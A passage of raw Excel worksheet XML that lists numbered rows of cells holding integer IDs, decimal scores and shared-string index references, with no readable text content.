        <v>12846</v>
      </c>
      <c r="H6495" t="s">
        <v>12847</v>
      </c>
    </row>
    <row r="6496" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6496" s="1">
        <v>6494</v>
      </c>
      <c r="B6496">
        <v>291</v>
      </c>
      <c r="C6496">
        <v>291</v>
      </c>
      <c r="D6496">
        <v>3</v>
      </c>
      <c r="E6496">
        <v>0.64899998903274536</v>
      </c>
      <c r="F6496" t="s">
        <v>10120</v>
      </c>
      <c r="G6496" t="s">
        <v>12848</v>
      </c>
      <c r="H6496" t="s">
        <v>12849</v>
      </c>
    </row>
    <row r="6497" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6497" s="1">
        <v>6495</v>
      </c>
      <c r="B6497">
        <v>4840</v>
      </c>
      <c r="C6497">
        <v>4840</v>
      </c>
      <c r="D6497">
        <v>3</v>
      </c>
      <c r="E6497">
        <v>0.94520002603530884</v>
      </c>
      <c r="F6497" t="s">
        <v>10120</v>
      </c>
      <c r="G6497" t="s">
        <v>12850</v>
      </c>
      <c r="H6497" t="s">
        <v>12851</v>
      </c>
    </row>
    <row r="6498" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6498" s="1">
        <v>6496</v>
      </c>
      <c r="B6498">
        <v>5307</v>
      </c>
      <c r="C6498">
        <v>5307</v>
      </c>
      <c r="D6498">
        <v>3</v>
      </c>
      <c r="E6498">
        <v>0.70709997415542603</v>
      </c>
      <c r="F6498" t="s">
        <v>10120</v>
      </c>
      <c r="G6498" t="s">
        <v>12852</v>
      </c>
      <c r="H6498" t="s">
        <v>12853</v>
      </c>
    </row>
    <row r="6499" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6499" s="1">
        <v>6497</v>
      </c>
      <c r="B6499">
        <v>115</v>
      </c>
      <c r="C6499">
        <v>115</v>
      </c>
      <c r="D6499">
        <v>3</v>
      </c>
      <c r="E6499">
        <v>0.67430001497268677</v>
      </c>
      <c r="F6499" t="s">
        <v>10120</v>
      </c>
      <c r="G6499" t="s">
        <v>12854</v>
      </c>
      <c r="H6499" t="s">
        <v>12855</v>
      </c>
    </row>
    <row r="6500" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6500" s="1">
        <v>6498</v>
      </c>
      <c r="B6500">
        <v>4823</v>
      </c>
      <c r="C6500">
        <v>4823</v>
      </c>
      <c r="D6500">
        <v>3</v>
      </c>
      <c r="E6500">
        <v>0.98280000686645508</v>
      </c>
      <c r="F6500" t="s">
        <v>10120</v>
      </c>
      <c r="G6500" t="s">
        <v>12856</v>
      </c>
      <c r="H6500" t="s">
        <v>12857</v>
      </c>
    </row>
    <row r="6501" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6501" s="1">
        <v>6499</v>
      </c>
      <c r="B6501">
        <v>4824</v>
      </c>
      <c r="C6501">
        <v>4824</v>
      </c>
      <c r="D6501">
        <v>3</v>
      </c>
      <c r="E6501">
        <v>0.68669998645782471</v>
      </c>
      <c r="F6501" t="s">
        <v>10120</v>
      </c>
      <c r="G6501" t="s">
        <v>12858</v>
      </c>
      <c r="H6501" t="s">
        <v>12859</v>
      </c>
    </row>
    <row r="6502" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6502" s="1">
        <v>6500</v>
      </c>
      <c r="B6502">
        <v>300</v>
      </c>
      <c r="C6502">
        <v>300</v>
      </c>
      <c r="D6502">
        <v>3</v>
      </c>
      <c r="E6502">
        <v>0.96890002489089966</v>
      </c>
      <c r="F6502" t="s">
        <v>10120</v>
      </c>
      <c r="G6502" t="s">
        <v>12860</v>
      </c>
      <c r="H6502" t="s">
        <v>12861</v>
      </c>
    </row>
    <row r="6503" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6503" s="1">
        <v>6501</v>
      </c>
      <c r="B6503">
        <v>5301</v>
      </c>
      <c r="C6503">
        <v>5301</v>
      </c>
      <c r="D6503">
        <v>3</v>
      </c>
      <c r="E6503">
        <v>0.56319999694824219</v>
      </c>
      <c r="F6503" t="s">
        <v>10120</v>
      </c>
      <c r="G6503" t="s">
        <v>12862</v>
      </c>
      <c r="H6503" t="s">
        <v>12863</v>
      </c>
    </row>
    <row r="6504" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6504" s="1">
        <v>6502</v>
      </c>
      <c r="B6504">
        <v>4826</v>
      </c>
      <c r="C6504">
        <v>4826</v>
      </c>
      <c r="D6504">
        <v>3</v>
      </c>
      <c r="E6504">
        <v>0.72630000114440918</v>
      </c>
      <c r="F6504" t="s">
        <v>10120</v>
      </c>
      <c r="G6504" t="s">
        <v>12864</v>
      </c>
      <c r="H6504" t="s">
        <v>12865</v>
      </c>
    </row>
    <row r="6505" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6505" s="1">
        <v>6503</v>
      </c>
      <c r="B6505">
        <v>5293</v>
      </c>
      <c r="C6505">
        <v>5293</v>
      </c>
      <c r="D6505">
        <v>3</v>
      </c>
      <c r="E6505">
        <v>0.99330002069473267</v>
      </c>
      <c r="F6505" t="s">
        <v>10120</v>
      </c>
      <c r="G6505" t="s">
        <v>12866</v>
      </c>
      <c r="H6505" t="s">
        <v>12867</v>
      </c>
    </row>
    <row r="6506" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6506" s="1">
        <v>6504</v>
      </c>
      <c r="B6506">
        <v>298</v>
      </c>
      <c r="C6506">
        <v>298</v>
      </c>
      <c r="D6506">
        <v>3</v>
      </c>
      <c r="E6506">
        <v>0.50389999151229858</v>
      </c>
      <c r="F6506" t="s">
        <v>10120</v>
      </c>
      <c r="G6506" t="s">
        <v>12868</v>
      </c>
      <c r="H6506" t="s">
        <v>12869</v>
      </c>
    </row>
    <row r="6507" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6507" s="1">
        <v>6505</v>
      </c>
      <c r="B6507">
        <v>296</v>
      </c>
      <c r="C6507">
        <v>296</v>
      </c>
      <c r="D6507">
        <v>3</v>
      </c>
      <c r="E6507">
        <v>0.89800000190734863</v>
      </c>
      <c r="F6507" t="s">
        <v>10120</v>
      </c>
      <c r="G6507" t="s">
        <v>12870</v>
      </c>
      <c r="H6507" t="s">
        <v>12871</v>
      </c>
    </row>
    <row r="6508" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6508" s="1">
        <v>6506</v>
      </c>
      <c r="B6508">
        <v>5291</v>
      </c>
      <c r="C6508">
        <v>5291</v>
      </c>
      <c r="D6508">
        <v>3</v>
      </c>
      <c r="E6508">
        <v>0.68730002641677856</v>
      </c>
      <c r="F6508" t="s">
        <v>10120</v>
      </c>
      <c r="G6508" t="s">
        <v>12872</v>
      </c>
      <c r="H6508" t="s">
        <v>12873</v>
      </c>
    </row>
    <row r="6509" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6509" s="1">
        <v>6507</v>
      </c>
      <c r="B6509">
        <v>4835</v>
      </c>
      <c r="C6509">
        <v>4835</v>
      </c>
      <c r="D6509">
        <v>3</v>
      </c>
      <c r="E6509">
        <v>0.7937999963760376</v>
      </c>
      <c r="F6509" t="s">
        <v>10120</v>
      </c>
      <c r="G6509" t="s">
        <v>12874</v>
      </c>
      <c r="H6509" t="s">
        <v>12875</v>
      </c>
    </row>
    <row r="6510" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6510" s="1">
        <v>6508</v>
      </c>
      <c r="B6510">
        <v>4838</v>
      </c>
      <c r="C6510">
        <v>4838</v>
      </c>
      <c r="D6510">
        <v>3</v>
      </c>
      <c r="E6510">
        <v>0.9976000189781189</v>
      </c>
      <c r="F6510" t="s">
        <v>10120</v>
      </c>
      <c r="G6510" t="s">
        <v>12876</v>
      </c>
      <c r="H6510" t="s">
        <v>12877</v>
      </c>
    </row>
    <row r="6511" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6511" s="1">
        <v>6509</v>
      </c>
      <c r="B6511">
        <v>5281</v>
      </c>
      <c r="C6511">
        <v>5281</v>
      </c>
      <c r="D6511">
        <v>3</v>
      </c>
      <c r="E6511">
        <v>0.89090001583099365</v>
      </c>
      <c r="F6511" t="s">
        <v>10120</v>
      </c>
      <c r="G6511" t="s">
        <v>12878</v>
      </c>
      <c r="H6511" t="s">
        <v>12879</v>
      </c>
    </row>
    <row r="6512" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6512" s="1">
        <v>6510</v>
      </c>
      <c r="B6512">
        <v>5259</v>
      </c>
      <c r="C6512">
        <v>5259</v>
      </c>
      <c r="D6512">
        <v>3</v>
      </c>
      <c r="E6512">
        <v>0.74000000953674316</v>
      </c>
      <c r="F6512" t="s">
        <v>10120</v>
      </c>
      <c r="G6512" t="s">
        <v>12880</v>
      </c>
      <c r="H6512" t="s">
        <v>12881</v>
      </c>
    </row>
    <row r="6513" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6513" s="1">
        <v>6511</v>
      </c>
      <c r="B6513">
        <v>4867</v>
      </c>
      <c r="C6513">
        <v>4867</v>
      </c>
      <c r="D6513">
        <v>3</v>
      </c>
      <c r="E6513">
        <v>0.84769999980926514</v>
      </c>
      <c r="F6513" t="s">
        <v>10120</v>
      </c>
      <c r="G6513" t="s">
        <v>12882</v>
      </c>
      <c r="H6513" t="s">
        <v>12883</v>
      </c>
    </row>
    <row r="6514" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6514" s="1">
        <v>6512</v>
      </c>
      <c r="B6514">
        <v>5229</v>
      </c>
      <c r="C6514">
        <v>5229</v>
      </c>
      <c r="D6514">
        <v>3</v>
      </c>
      <c r="E6514">
        <v>0.67199999094009399</v>
      </c>
      <c r="F6514" t="s">
        <v>10120</v>
      </c>
      <c r="G6514" t="s">
        <v>12884</v>
      </c>
      <c r="H6514" t="s">
        <v>12885</v>
      </c>
    </row>
    <row r="6515" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6515" s="1">
        <v>6513</v>
      </c>
      <c r="B6515">
        <v>283</v>
      </c>
      <c r="C6515">
        <v>283</v>
      </c>
      <c r="D6515">
        <v>3</v>
      </c>
      <c r="E6515">
        <v>0.680899977684021</v>
      </c>
      <c r="F6515" t="s">
        <v>10120</v>
      </c>
      <c r="G6515" t="s">
        <v>12886</v>
      </c>
      <c r="H6515" t="s">
        <v>12887</v>
      </c>
    </row>
    <row r="6516" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6516" s="1">
        <v>6514</v>
      </c>
      <c r="B6516">
        <v>4885</v>
      </c>
      <c r="C6516">
        <v>4885</v>
      </c>
      <c r="D6516">
        <v>3</v>
      </c>
      <c r="E6516">
        <v>0.81679999828338623</v>
      </c>
      <c r="F6516" t="s">
        <v>10120</v>
      </c>
      <c r="G6516" t="s">
        <v>12888</v>
      </c>
      <c r="H6516" t="s">
        <v>12889</v>
      </c>
    </row>
    <row r="6517" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6517" s="1">
        <v>6515</v>
      </c>
      <c r="B6517">
        <v>4912</v>
      </c>
      <c r="C6517">
        <v>4912</v>
      </c>
      <c r="D6517">
        <v>3</v>
      </c>
      <c r="E6517">
        <v>0.57829999923706055</v>
      </c>
      <c r="F6517" t="s">
        <v>10120</v>
      </c>
      <c r="G6517" t="s">
        <v>12890</v>
      </c>
      <c r="H6517" t="s">
        <v>12891</v>
      </c>
    </row>
    <row r="6518" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6518" s="1">
        <v>6516</v>
      </c>
      <c r="B6518">
        <v>5218</v>
      </c>
      <c r="C6518">
        <v>5218</v>
      </c>
      <c r="D6518">
        <v>3</v>
      </c>
      <c r="E6518">
        <v>0.5812000036239624</v>
      </c>
      <c r="F6518" t="s">
        <v>10120</v>
      </c>
      <c r="G6518" t="s">
        <v>12892</v>
      </c>
      <c r="H6518" t="s">
        <v>12893</v>
      </c>
    </row>
    <row r="6519" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6519" s="1">
        <v>6517</v>
      </c>
      <c r="B6519">
        <v>4922</v>
      </c>
      <c r="C6519">
        <v>4922</v>
      </c>
      <c r="D6519">
        <v>3</v>
      </c>
      <c r="E6519">
        <v>0.56230002641677856</v>
      </c>
      <c r="F6519" t="s">
        <v>10120</v>
      </c>
      <c r="G6519" t="s">
        <v>12894</v>
      </c>
      <c r="H6519" t="s">
        <v>12895</v>
      </c>
    </row>
    <row r="6520" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6520" s="1">
        <v>6518</v>
      </c>
      <c r="B6520">
        <v>4928</v>
      </c>
      <c r="C6520">
        <v>4928</v>
      </c>
      <c r="D6520">
        <v>3</v>
      </c>
      <c r="E6520">
        <v>0.95469999313354492</v>
      </c>
      <c r="F6520" t="s">
        <v>10120</v>
      </c>
      <c r="G6520" t="s">
        <v>12896</v>
      </c>
      <c r="H6520" t="s">
        <v>12897</v>
      </c>
    </row>
    <row r="6521" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6521" s="1">
        <v>6519</v>
      </c>
      <c r="B6521">
        <v>4929</v>
      </c>
      <c r="C6521">
        <v>4929</v>
      </c>
      <c r="D6521">
        <v>3</v>
      </c>
      <c r="E6521">
        <v>0.85039997100830078</v>
      </c>
      <c r="F6521" t="s">
        <v>10120</v>
      </c>
      <c r="G6521" t="s">
        <v>12898</v>
      </c>
      <c r="H6521" t="s">
        <v>12899</v>
      </c>
    </row>
    <row r="6522" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6522" s="1">
        <v>6520</v>
      </c>
      <c r="B6522">
        <v>4930</v>
      </c>
      <c r="C6522">
        <v>4930</v>
      </c>
      <c r="D6522">
        <v>3</v>
      </c>
      <c r="E6522">
        <v>0.88539999723434448</v>
      </c>
      <c r="F6522" t="s">
        <v>10120</v>
      </c>
      <c r="G6522" t="s">
        <v>12900</v>
      </c>
      <c r="H6522" t="s">
        <v>12901</v>
      </c>
    </row>
    <row r="6523" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6523" s="1">
        <v>6521</v>
      </c>
      <c r="B6523">
        <v>146</v>
      </c>
      <c r="C6523">
        <v>146</v>
      </c>
      <c r="D6523">
        <v>3</v>
      </c>
      <c r="E6523">
        <v>0.90369999408721924</v>
      </c>
      <c r="F6523" t="s">
        <v>10120</v>
      </c>
      <c r="G6523" t="s">
        <v>12902</v>
      </c>
      <c r="H6523" t="s">
        <v>12903</v>
      </c>
    </row>
    <row r="6524" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6524" s="1">
        <v>6522</v>
      </c>
      <c r="B6524">
        <v>262</v>
      </c>
      <c r="C6524">
        <v>262</v>
      </c>
      <c r="D6524">
        <v>3</v>
      </c>
      <c r="E6524">
        <v>0.59950000047683716</v>
      </c>
      <c r="F6524" t="s">
        <v>10120</v>
      </c>
      <c r="G6524" t="s">
        <v>12904</v>
      </c>
      <c r="H6524" t="s">
        <v>12905</v>
      </c>
    </row>
    <row r="6525" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6525" s="1">
        <v>6523</v>
      </c>
      <c r="B6525">
        <v>147</v>
      </c>
      <c r="C6525">
        <v>147</v>
      </c>
      <c r="D6525">
        <v>3</v>
      </c>
      <c r="E6525">
        <v>0.74629998207092285</v>
      </c>
      <c r="F6525" t="s">
        <v>10120</v>
      </c>
      <c r="G6525" t="s">
        <v>12906</v>
      </c>
      <c r="H6525" t="s">
        <v>12907</v>
      </c>
    </row>
    <row r="6526" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6526" s="1">
        <v>6524</v>
      </c>
      <c r="B6526">
        <v>261</v>
      </c>
      <c r="C6526">
        <v>261</v>
      </c>
      <c r="D6526">
        <v>3</v>
      </c>
      <c r="E6526">
        <v>0.44839999079704279</v>
      </c>
      <c r="F6526" t="s">
        <v>10120</v>
      </c>
      <c r="G6526" t="s">
        <v>12908</v>
      </c>
      <c r="H6526" t="s">
        <v>10488</v>
      </c>
    </row>
    <row r="6527" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6527" s="1">
        <v>6525</v>
      </c>
      <c r="B6527">
        <v>260</v>
      </c>
      <c r="C6527">
        <v>260</v>
      </c>
      <c r="D6527">
        <v>3</v>
      </c>
      <c r="E6527">
        <v>0.54110002517700195</v>
      </c>
      <c r="F6527" t="s">
        <v>10120</v>
      </c>
      <c r="G6527" t="s">
        <v>12909</v>
      </c>
      <c r="H6527" t="s">
        <v>12910</v>
      </c>
    </row>
    <row r="6528" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6528" s="1">
        <v>6526</v>
      </c>
      <c r="B6528">
        <v>5207</v>
      </c>
      <c r="C6528">
        <v>5207</v>
      </c>
      <c r="D6528">
        <v>3</v>
      </c>
      <c r="E6528">
        <v>0.50959998369216919</v>
      </c>
      <c r="F6528" t="s">
        <v>10120</v>
      </c>
      <c r="G6528" t="s">
        <v>12911</v>
      </c>
      <c r="H6528" t="s">
        <v>12912</v>
      </c>
    </row>
    <row r="6529" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6529" s="1">
        <v>6527</v>
      </c>
      <c r="B6529">
        <v>4936</v>
      </c>
      <c r="C6529">
        <v>4936</v>
      </c>
      <c r="D6529">
        <v>3</v>
      </c>
      <c r="E6529">
        <v>0.52619999647140503</v>
      </c>
      <c r="F6529" t="s">
        <v>10120</v>
      </c>
      <c r="G6529" t="s">
        <v>12913</v>
      </c>
      <c r="H6529" t="s">
        <v>12914</v>
      </c>
    </row>
    <row r="6530" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6530" s="1">
        <v>6528</v>
      </c>
      <c r="B6530">
        <v>150</v>
      </c>
      <c r="C6530">
        <v>150</v>
      </c>
      <c r="D6530">
        <v>3</v>
      </c>
      <c r="E6530">
        <v>0.78159999847412109</v>
      </c>
      <c r="F6530" t="s">
        <v>10120</v>
      </c>
      <c r="G6530" t="s">
        <v>12915</v>
      </c>
      <c r="H6530" t="s">
        <v>12916</v>
      </c>
    </row>
    <row r="6531" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6531" s="1">
        <v>6529</v>
      </c>
      <c r="B6531">
        <v>4943</v>
      </c>
      <c r="C6531">
        <v>4943</v>
      </c>
      <c r="D6531">
        <v>3</v>
      </c>
      <c r="E6531">
        <v>0.99809998273849487</v>
      </c>
      <c r="F6531" t="s">
        <v>10120</v>
      </c>
      <c r="G6531" t="s">
        <v>12917</v>
      </c>
      <c r="H6531" t="s">
        <v>12918</v>
      </c>
    </row>
    <row r="6532" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6532" s="1">
        <v>6530</v>
      </c>
      <c r="B6532">
        <v>5223</v>
      </c>
      <c r="C6532">
        <v>5223</v>
      </c>
      <c r="D6532">
        <v>3</v>
      </c>
      <c r="E6532">
        <v>0.98420000076293945</v>
      </c>
      <c r="F6532" t="s">
        <v>10120</v>
      </c>
      <c r="G6532" t="s">
        <v>12919</v>
      </c>
      <c r="H6532" t="s">
        <v>12920</v>
      </c>
    </row>
    <row r="6533" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6533" s="1">
        <v>6531</v>
      </c>
      <c r="B6533">
        <v>4949</v>
      </c>
      <c r="C6533">
        <v>4949</v>
      </c>
      <c r="D6533">
        <v>3</v>
      </c>
      <c r="E6533">
        <v>0.58459997177124023</v>
      </c>
      <c r="F6533" t="s">
        <v>10120</v>
      </c>
      <c r="G6533" t="s">
        <v>12921</v>
      </c>
      <c r="H6533" t="s">
        <v>12922</v>
      </c>
    </row>
    <row r="6534" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6534" s="1">
        <v>6532</v>
      </c>
      <c r="B6534">
        <v>4907</v>
      </c>
      <c r="C6534">
        <v>4907</v>
      </c>
      <c r="D6534">
        <v>3</v>
      </c>
      <c r="E6534">
        <v>0.94609999656677246</v>
      </c>
      <c r="F6534" t="s">
        <v>10120</v>
      </c>
      <c r="G6534" t="s">
        <v>12923</v>
      </c>
      <c r="H6534" t="s">
        <v>12924</v>
      </c>
    </row>
    <row r="6535" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6535" s="1">
        <v>6533</v>
      </c>
      <c r="B6535">
        <v>5224</v>
      </c>
      <c r="C6535">
        <v>5224</v>
      </c>
      <c r="D6535">
        <v>3</v>
      </c>
      <c r="E6535">
        <v>0.97469997406005859</v>
      </c>
      <c r="F6535" t="s">
        <v>10120</v>
      </c>
      <c r="G6535" t="s">
        <v>12925</v>
      </c>
      <c r="H6535" t="s">
        <v>12926</v>
      </c>
    </row>
    <row r="6536" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6536" s="1">
        <v>6534</v>
      </c>
      <c r="B6536">
        <v>4886</v>
      </c>
      <c r="C6536">
        <v>4886</v>
      </c>
      <c r="D6536">
        <v>3</v>
      </c>
      <c r="E6536">
        <v>0.857200026512146</v>
      </c>
      <c r="F6536" t="s">
        <v>10120</v>
      </c>
      <c r="G6536" t="s">
        <v>12927</v>
      </c>
      <c r="H6536" t="s">
        <v>12928</v>
      </c>
    </row>
    <row r="6537" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6537" s="1">
        <v>6535</v>
      </c>
      <c r="B6537">
        <v>4887</v>
      </c>
      <c r="C6537">
        <v>4887</v>
      </c>
      <c r="D6537">
        <v>3</v>
      </c>
      <c r="E6537">
        <v>0.61690002679824829</v>
      </c>
      <c r="F6537" t="s">
        <v>10120</v>
      </c>
      <c r="G6537" t="s">
        <v>12929</v>
      </c>
      <c r="H6537" t="s">
        <v>12930</v>
      </c>
    </row>
    <row r="6538" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6538" s="1">
        <v>6536</v>
      </c>
      <c r="B6538">
        <v>282</v>
      </c>
      <c r="C6538">
        <v>282</v>
      </c>
      <c r="D6538">
        <v>3</v>
      </c>
      <c r="E6538">
        <v>0.51730000972747803</v>
      </c>
      <c r="F6538" t="s">
        <v>10120</v>
      </c>
      <c r="G6538" t="s">
        <v>12931</v>
      </c>
      <c r="H6538" t="s">
        <v>12932</v>
      </c>
    </row>
    <row r="6539" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6539" s="1">
        <v>6537</v>
      </c>
      <c r="B6539">
        <v>4890</v>
      </c>
      <c r="C6539">
        <v>4890</v>
      </c>
      <c r="D6539">
        <v>3</v>
      </c>
      <c r="E6539">
        <v>0.77999997138977051</v>
      </c>
      <c r="F6539" t="s">
        <v>10120</v>
      </c>
      <c r="G6539" t="s">
        <v>12933</v>
      </c>
      <c r="H6539" t="s">
        <v>12934</v>
      </c>
    </row>
    <row r="6540" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6540" s="1">
        <v>6538</v>
      </c>
      <c r="B6540">
        <v>4892</v>
      </c>
      <c r="C6540">
        <v>4892</v>
      </c>
      <c r="D6540">
        <v>3</v>
      </c>
      <c r="E6540">
        <v>0.85089999437332153</v>
      </c>
      <c r="F6540" t="s">
        <v>10120</v>
      </c>
      <c r="G6540" t="s">
        <v>12935</v>
      </c>
      <c r="H6540" t="s">
        <v>12936</v>
      </c>
    </row>
    <row r="6541" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6541" s="1">
        <v>6539</v>
      </c>
      <c r="B6541">
        <v>4893</v>
      </c>
      <c r="C6541">
        <v>4893</v>
      </c>
      <c r="D6541">
        <v>3</v>
      </c>
      <c r="E6541">
        <v>0.85030001401901245</v>
      </c>
      <c r="F6541" t="s">
        <v>10120</v>
      </c>
      <c r="G6541" t="s">
        <v>12937</v>
      </c>
      <c r="H6541" t="s">
        <v>12938</v>
      </c>
    </row>
    <row r="6542" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6542" s="1">
        <v>6540</v>
      </c>
      <c r="B6542">
        <v>4894</v>
      </c>
      <c r="C6542">
        <v>4894</v>
      </c>
      <c r="D6542">
        <v>3</v>
      </c>
      <c r="E6542">
        <v>0.75209999084472656</v>
      </c>
      <c r="F6542" t="s">
        <v>10120</v>
      </c>
      <c r="G6542" t="s">
        <v>12939</v>
      </c>
      <c r="H6542" t="s">
        <v>12940</v>
      </c>
    </row>
    <row r="6543" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6543" s="1">
        <v>6541</v>
      </c>
      <c r="B6543">
        <v>4895</v>
      </c>
      <c r="C6543">
        <v>4895</v>
      </c>
      <c r="D6543">
        <v>3</v>
      </c>
      <c r="E6543">
        <v>0.93709999322891235</v>
      </c>
      <c r="F6543" t="s">
        <v>10120</v>
      </c>
      <c r="G6543" t="s">
        <v>12941</v>
      </c>
      <c r="H6543" t="s">
        <v>12942</v>
      </c>
    </row>
    <row r="6544" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6544" s="1">
        <v>6542</v>
      </c>
      <c r="B6544">
        <v>4896</v>
      </c>
      <c r="C6544">
        <v>4896</v>
      </c>
      <c r="D6544">
        <v>3</v>
      </c>
      <c r="E6544">
        <v>0.9024999737739563</v>
      </c>
      <c r="F6544" t="s">
        <v>10120</v>
      </c>
      <c r="G6544" t="s">
        <v>12943</v>
      </c>
      <c r="H6544" t="s">
        <v>12944</v>
      </c>
    </row>
    <row r="6545" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6545" s="1">
        <v>6543</v>
      </c>
      <c r="B6545">
        <v>4897</v>
      </c>
      <c r="C6545">
        <v>4897</v>
      </c>
      <c r="D6545">
        <v>3</v>
      </c>
      <c r="E6545">
        <v>0.93309998512268066</v>
      </c>
      <c r="F6545" t="s">
        <v>10120</v>
      </c>
      <c r="G6545" t="s">
        <v>12945</v>
      </c>
      <c r="H6545" t="s">
        <v>12946</v>
      </c>
    </row>
    <row r="6546" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6546" s="1">
        <v>6544</v>
      </c>
      <c r="B6546">
        <v>4898</v>
      </c>
      <c r="C6546">
        <v>4898</v>
      </c>
      <c r="D6546">
        <v>3</v>
      </c>
      <c r="E6546">
        <v>0.63209998607635498</v>
      </c>
      <c r="F6546" t="s">
        <v>10120</v>
      </c>
      <c r="G6546" t="s">
        <v>12947</v>
      </c>
      <c r="H6546" t="s">
        <v>12948</v>
      </c>
    </row>
    <row r="6547" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6547" s="1">
        <v>6545</v>
      </c>
      <c r="B6547">
        <v>4899</v>
      </c>
      <c r="C6547">
        <v>4899</v>
      </c>
      <c r="D6547">
        <v>3</v>
      </c>
      <c r="E6547">
        <v>0.57120001316070557</v>
      </c>
      <c r="F6547" t="s">
        <v>10120</v>
      </c>
      <c r="G6547" t="s">
        <v>12949</v>
      </c>
      <c r="H6547" t="s">
        <v>12950</v>
      </c>
    </row>
    <row r="6548" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6548" s="1">
        <v>6546</v>
      </c>
      <c r="B6548">
        <v>4901</v>
      </c>
      <c r="C6548">
        <v>4901</v>
      </c>
      <c r="D6548">
        <v>3</v>
      </c>
      <c r="E6548">
        <v>0.56349998712539673</v>
      </c>
      <c r="F6548" t="s">
        <v>10120</v>
      </c>
      <c r="G6548" t="s">
        <v>12951</v>
      </c>
      <c r="H6548" t="s">
        <v>12952</v>
      </c>
    </row>
    <row r="6549" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6549" s="1">
        <v>6547</v>
      </c>
      <c r="B6549">
        <v>4903</v>
      </c>
      <c r="C6549">
        <v>4903</v>
      </c>
      <c r="D6549">
        <v>3</v>
      </c>
      <c r="E6549">
        <v>0.86760002374649048</v>
      </c>
      <c r="F6549" t="s">
        <v>10120</v>
      </c>
      <c r="G6549" t="s">
        <v>12953</v>
      </c>
      <c r="H6549" t="s">
        <v>12954</v>
      </c>
    </row>
    <row r="6550" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6550" s="1">
        <v>6548</v>
      </c>
      <c r="B6550">
        <v>4904</v>
      </c>
      <c r="C6550">
        <v>4904</v>
      </c>
      <c r="D6550">
        <v>3</v>
      </c>
      <c r="E6550">
        <v>0.75029999017715454</v>
      </c>
      <c r="F6550" t="s">
        <v>10120</v>
      </c>
      <c r="G6550" t="s">
        <v>12955</v>
      </c>
      <c r="H6550" t="s">
        <v>12956</v>
      </c>
    </row>
    <row r="6551" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6551" s="1">
        <v>6549</v>
      </c>
      <c r="B6551">
        <v>275</v>
      </c>
      <c r="C6551">
        <v>275</v>
      </c>
      <c r="D6551">
        <v>3</v>
      </c>
      <c r="E6551">
        <v>0.6315000057220459</v>
      </c>
      <c r="F6551" t="s">
        <v>10120</v>
      </c>
      <c r="G6551" t="s">
        <v>12957</v>
      </c>
      <c r="H6551" t="s">
        <v>12958</v>
      </c>
    </row>
    <row r="6552" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6552" s="1">
        <v>6550</v>
      </c>
      <c r="B6552">
        <v>437</v>
      </c>
      <c r="C6552">
        <v>437</v>
      </c>
      <c r="D6552">
        <v>3</v>
      </c>
      <c r="E6552">
        <v>0.92849999666213989</v>
      </c>
      <c r="F6552" t="s">
        <v>10120</v>
      </c>
      <c r="G6552" t="s">
        <v>12959</v>
      </c>
      <c r="H6552" t="s">
        <v>12960</v>
      </c>
    </row>
    <row r="6553" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6553" s="1">
        <v>6551</v>
      </c>
      <c r="B6553">
        <v>421</v>
      </c>
      <c r="C6553">
        <v>421</v>
      </c>
      <c r="D6553">
        <v>3</v>
      </c>
      <c r="E6553">
        <v>0.56150001287460327</v>
      </c>
      <c r="F6553" t="s">
        <v>10120</v>
      </c>
      <c r="G6553" t="s">
        <v>12961</v>
      </c>
      <c r="H6553" t="s">
        <v>12962</v>
      </c>
    </row>
    <row r="6554" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6554" s="1">
        <v>6552</v>
      </c>
      <c r="B6554">
